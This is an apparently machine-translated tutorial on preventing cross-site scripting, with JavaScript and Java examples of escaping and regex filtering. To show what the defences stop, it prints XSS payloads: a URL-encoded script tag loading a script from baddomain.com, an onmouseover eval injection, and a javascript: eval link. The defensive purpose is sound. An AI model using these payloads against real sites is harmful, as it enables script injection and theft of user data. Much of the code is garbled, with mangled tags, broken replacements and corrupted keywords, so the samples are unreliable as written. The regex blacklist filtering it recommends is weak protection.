Prevents cross-site scripting attacks

 

Escape parameters and user input

 

 

This is a classic XSS attack that can open your services or Web applications and be attacked by hackers. According to the design, the website displays the user ID, which is passed as a URL parameter. The following script will take the ID and display a welcome message.

 

<Script type = "text/javascript">

 

Var start = window. location. href. indexOf ("id ");

 

Var stop = window. location. href. length;

 

Var id = "guest ";

 

If (start <stop ){

 

Id = decodeURIComponent (window. location. href. substring (start, stop ));

 

}

 

Document. write ("Hi" + id );

 

</Script>

 

What is index.html? Id=greg(the page with a fake script is index.html) will result in:

 

Hi, greg

 

What will happen, instead of "greg" I use the following URL:

 

Index.html ID = % 3 Cscript % 20src = % 22 http: // baddomain.com/badscript. js % 22% 3E % 3C/script % 3E

 

Note that the URL above contains a script link http://baddomain.com/badscript.js, which contains malicious code from different domains. This script is evaluated when the page and all risky data are loaded.

 

To prevent these attack types, client code should always escape the "<" and ">" parameter display or JavaScript code for evaluation.

 

You can see a simple code line in the next example.

 

<Script type = "text/javascript">

Var start = window. location. href. indexOf ("id ");

Var stop = window. location. href. length;

Var id = "guest ";

If (start <stop ){

Id = decodeURIComponent (window. location. href. substring (start, stop ));

<Span style = "color: green" id = id. replace (/</g, "<"). replace (/>/g, "> ");

}

Document. write ("hi" + id );

</Script>

Consider the following containing a form where a user enters a description that will be visible to other users.

<Html>

<Head>

<Script type = "text/javascript">

Function displayName (){

Var description = document. getElementById ("description"). value;

Var display = document. getElementById ("display ");

Display. innerHTML = description;

}

 

</Script>

</Head>

<Body>

<Form onsubmit = "displayName (); return false;">

<Textarea id = "description" type = "text" cols = "55" rows = "5"> </textarea>

<Input type = "submit" value = "Show Description">

</Form>

<Div id = "display"> </div>

 

</Body>

<Ml>

Does it seem innocent enough? Try to include the following content in the text area.

 

 

 

<A onmouseover = "eval ('s = document. createElement (\ 'script \ '); document. body. appendChild (s); s. src = \ 'badscript. js \ '')"> Mouse Over Me </a>

 

A hovering link causes a script badscript. js to be loaded. This script can also pass cookies or any other information, and it wants the "s. src" URL parameter. Unlike in the first example, users need to click a bad link. This type of attack requires a simple badscript. js loaded with a mouse hover.

 

So now the question is: "How do you protect your webpage from being used ?"

 

With parameters, you should escape form input. If you plan to allow users to provide their own markup, consider the future solution "delete eval (), JavaScript, and scripts from the user-supplied markup.

 

The following code shows how to escape the tag on the client. Www.2cto.com

 

<Html>

<Head>

<Script type = "text/javascript">

Function displayName (){

Var description = document. getElementById ("description"). value;

Var display = document. getElementById ("display ");

Description = description. replace (/</g, "<"). replace (/>/g, "> ");

Display. innerHTML = description;

}

 

</Script>

</Head>

<Body>

<Form onsubmit = "displayName (); return false;">

<Textarea id = "description" type = "text" cols = "55" rows = "5"> </textarea>

<Input type = "submit" value = "Show Description">

</Form>

<Div id = "display"> </div>

 

</Body>

<Ml>

Code description = description. replace (// g, ">"); filter user input and prevent unnecessary scripts from being executed.

 

Now, we have seen how to prevent most attacks. In the next section, you want to allow users to provide tags that do not contain malicious code.

 

 

 

Eval () function deletion, browser:, from user-provided markup and script

 

If possible, you want to allow users to add tags, such as displaying links or HTML content seen by other users. A blog can provide users with URL, HTML Tag, HTML comment, or any other mark. Before it is displayed on or before a page, it is sent to the server or service. The solution is to filter all the tags. The following example demonstrates how to prevent malicious code and allow some HTML tags.

 

<Html>

<Head>

<Script type = "text/javascript">

Function displayName (){

Var description = document. getElementById ("description"). value;

Var display = document. getElementById ("display ");

Description. replace (/[\ "\ '] [\ s] * javascript :(. *) [\" \']/gi ,"\"\"");

Description = description. replace (/script (. *)/gi ,"");

Description = description. replace (/eval \ (. *) \)/gi ,"");

 

Display. innerHTML = description;

}

</Script>

</Head>

<Body>

<Form onsubmit = "displayName (); return false;">

<Textarea id = "description" type = "text" cols = "55" rows = "5"> </textarea>

<Input type = "submit" value = "Show Description">

</Form>

 

<Div id = "display"> </div>

</Body>

<Ml>

In the preceding example, all eval () is deleted. JavaScript scripts reference field input. The replacement here is not perfect because it may replace the legal use of JavaScript and scripts in the document body. You may consider modifying a regular expression to view only the attributes of a tag, for example, deleting a script. There are other considerations, such as line break character sets, which are case sensitive. You should keep in mind when launching the client code for attacks. Because some browsers allow you to specify CSS styles to be called from JavaScript, you should also consider searching the CSS styles provided by users, as well.

 

 

 

Filter user input on the server

 

Most of the problems related to cross-site scripting are caused by poorly designed clients. The server can also reluctantly become a participant in cross-origin scripting attacks if they re-display unfiltered user input. Consider the following example. A hacker manually sets an http post request with the following homepage URL.

 

<A href = "Export CEPT: eval ('alert (\ 'bad \ ');"> click me </a>

 

The URL will be stored on the server as JavaScript that exposes the URL clicked by any user. The above example does not seem innocent, but considers what will happen. If the alarm ("bad"), the "Browser" contains malicious code. To prevent such attacks, you should filter user input on the server. The following Java example demonstrates how to use a regular expression to replace and filter user input.

 

String description = request. getParameter ("description ");

 

Description = description. replaceAll ("<", "<"). replaceAll (">", "> ");

 

Description = description. replaceAll ("eval \\((.*)\\)","");

 

 

 

Description = description. replaceAll ("[\" \ '] [\ s] * (? I) javascript) :(. *) [\ "\ ']", "\" \ "");

 

Description = description. replaceAll ("((? I) script )","");

 

The eval () call deleted in the code above, JAVASCRIPT call and Script Reference replacement are not perfect because it may replace JavaScript and script file subjects for legal purposes. The code above can be applied to all input parameters or each parameter in use. Based on the tag size, you want to allow users to provide a servlet, servlet filter, or JSF component. You may need to improve the regular expression filtering content to deal with more, or consider the creation of a Java library, specifically to clear malicious code.

 

JSONP"

 

Use notes and dynamic Script Injection

 

Dynamic script injection can be powerful and useful for retrieving JSON data (also known as JSONP) because it isolates your client from the source server. There is still a debate about using JSONP. Some people think that JavaScript as a hacker or security vulnerability, because when you are dynamic, including your reference to third-party scripts, complete access to your web scripts. This script can continue to inject other scripts or do almost anything you want.

 

If you choose to use JSONP to ensure that you interact with the website you trust. Is there any script that can block a JSONP provider from including JSONP data that is not required. An alternative solution that provides proxy services allows you to control output, restrict access, and cache required.

 

 

 

Prevents XSS phishing attacks

 

We recommend that you focus on protecting yourself as a user from a website and be vulnerable to cross-site scripting attacks.

 

Phishing attacks, or attacks, seem to be a valid URL link to a fraudulent web page for the purpose of collecting user data and what's new to the online world. A related attack includes a cross-site scripting attack. A valid website has a cross-site scripting vulnerability. The URL contains a script reference. This kind of contact may appear in an email, blog post/post comments, or other user-generated content that contains a URL. Clicking a link to a site contains a cross-site scripting vulnerability may cause third-party scripts to include your password, user ID, or any other data as required. See the following example:

Quick lookup in the URL shows that it references the website http://baidu.com/index.html. Once the script is included in the URL parameter, it may not be visible to any uninformed user.

 

It is also wise to always take a closer look at the URL and compare it with the URL parameters they provide. The URL will always be displayed in the status bar of your browser, and you should always look for external script reference. Another solution is to manually enter the link in the URL bar of the browser, if the link is suspected.

 

Learn about known vulnerabilities and be very careful when you provide any personal data for these websites.

 

Although JavaScript-based interfaces can be very flexible, you must be very careful about the input provided by all users, whether as a parameter or form data. Ensure that the client and server inputs on the escape or filter are used. As a user, you should be careful not to become a victim of a vulnerable website. This is a better and safer message!

 

By: 301

 

Zeracker@gmail.com